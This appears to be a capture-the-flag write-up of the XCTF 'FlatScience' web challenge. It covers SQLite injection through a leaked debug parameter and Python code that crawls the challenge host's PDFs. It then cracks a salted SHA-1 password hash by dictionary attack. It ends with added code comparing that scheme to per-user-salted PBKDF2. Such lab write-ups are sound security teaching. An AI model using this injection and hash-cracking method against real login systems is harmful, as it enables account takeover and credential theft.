FlatScience: a detailed walkthrough of FlatScience from the XCTF web advanced section
Directory scan
The usual directory scan turned up an admin.php and a login.php.
Testing for injection and universal passwords
Let's have a look at admin.php and login.php.
admin.php: I tested it for injection and got nothing; inspecting the page source shows the challenge hints at this as well, so there is nothing to be done here.
login.php: testing it produced an error, nice; inspecting the source reveals a hint about a debug parameter.
Adding the debug parameter exposes the source code. The password is SHA-1 hashed with a salt appended before it is stored in the database. Seeing sqlite3 left me baffled, since I have used SQLite far too little (mainly because I'm bad at this ~~~), so I went off to learn the relevant SQLite syntax:
https://www.cnblogs.com/xiaozi/p/5760321.html
It worked as expected. The exposed code puts the query result into a cookie, so let's decode the returned data.
The table has several fields; query the username, password and hint fields.
This hint gave me a bad feeling: it says the favourite word is in a paper, and I went numb seeing so many URLs and PDFs.
But there is no way to search them by hand, since each paper is thousands of words long, so let's write a program.
Collect every PDF URL and download the files locally; recursion is needed here.
import re
import requests

# A PDF name is a 32-character hex string followed by ".pdf"
regular_pdf = r'[a-fA-F0-9]{32}\.pdf'
# Sub-directories are a single digit followed by "/"
regular_url = r'\d/'
root_url = 'http://111.200.241.244:57162/'
pdf_list = []

def get_url(url):
    # Walk the directory tree: each index.html lists sub-directories and PDFs
    result = requests.get(url + "index.html")
    if result.status_code == 404:
        return
    re_url = re.findall(regular_url, result.text)
    print(re_url)
    re_pdf = re.findall(regular_pdf, result.text)
    for pdf in re_pdf:
        pdf_list.append(url + pdf)
    # Recurse into every sub-directory found on this page
    for suffix_url in re_url:
        get_url(url + suffix_url)

def download_pdf(pdf_list):
    for pdf_url in pdf_list:
        result = requests.get(pdf_url)
        # The last 36 characters are the 32 hex digits plus ".pdf"
        with open(r'/Users/yingjun/PycharmProjects/Test/pdf/' + pdf_url[-36:], 'wb') as file:
            file.write(result.content)

get_url(root_url)
print(pdf_list)
download_pdf(pdf_list)
Extract every word from all the PDFs, hash each one the same way and compare it with the password hash.
import hashlib
import os
import pdfplumber

# The SHA-1 hash recovered from the database
crypto_password = '3fab54a50e770d830c0416df817567662a9dc85c'
words_list = []
pdf_path = []
root_path = '/Users/yingjun/PycharmProjects/Test/pdf/'

def crypto_str(word):
    # Reproduce the scheme from the leaked source: sha1(word + fixed salt)
    word = word + 'Salz!'
    encrypts = hashlib.sha1(word.encode("utf-8")).hexdigest()
    return encrypts

def get_content(path):
    # Collect every whitespace-separated token from every page of the PDF
    with pdfplumber.open(path) as pdf:
        for page in pdf.pages:
            content = page.extract_text()
            if content:  # extract_text() returns None for pages without text
                words_list.extend(content.split())

def get_pdf_name(path):
    filelist = os.listdir(path)
    for item in filelist:
        pdf_path.append(item)

get_pdf_name(root_path)
for path in pdf_path:
    get_content(root_path + path)
for word in words_list:
    encrypts = crypto_str(word)
    if encrypts == crypto_password:
        print("-------------------------找到了------------------------------------")
        print(word)
Found it. nice!!!! ThinJerboa
Log in and get the flag.
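The leaked scheme, sha1(password + 'Salz!'), uses a single fast hash round and the same salt for every user, which is why a word list taken from the papers was enough. As an added example (not code from the challenge or from this writeup), here is that scheme next to a per-user-salted slow KDF built only from Python's standard library; the iteration count and the sample passwords are constructed assumptions.

```python
import hashlib
import hmac
import os
from typing import Optional

STATIC_SALT = "Salz!"  # the fixed salt appended by the leaked login.php


def weak_hash(password: str) -> str:
    """The challenge's scheme: one SHA-1 over password + a salt shared by all users."""
    return hashlib.sha1((password + STATIC_SALT).encode("utf-8")).hexdigest()


def strong_hash(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Per-user random salt plus PBKDF2-HMAC-SHA256 (iteration count is an assumed value).

    Returns a self-describing string so the salt and cost travel with the hash."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_strong(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost, then compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def same_password_detectable(pw: str, hash_func) -> bool:
    """True if two accounts sharing a password end up with identical stored hashes.

    Under the weak scheme this is always True (no per-user salt), so one
    precomputed table of sha1(word + 'Salz!') serves every account at once."""
    return hash_func(pw) == hash_func(pw)


if __name__ == "__main__":
    pw = "correct horse"  # constructed sample password
    print("weak  :", weak_hash(pw), same_password_detectable(pw, weak_hash))
    print("strong:", strong_hash(pw, iterations=10_000),
          same_password_detectable(pw, lambda p: strong_hash(p, iterations=10_000)))
```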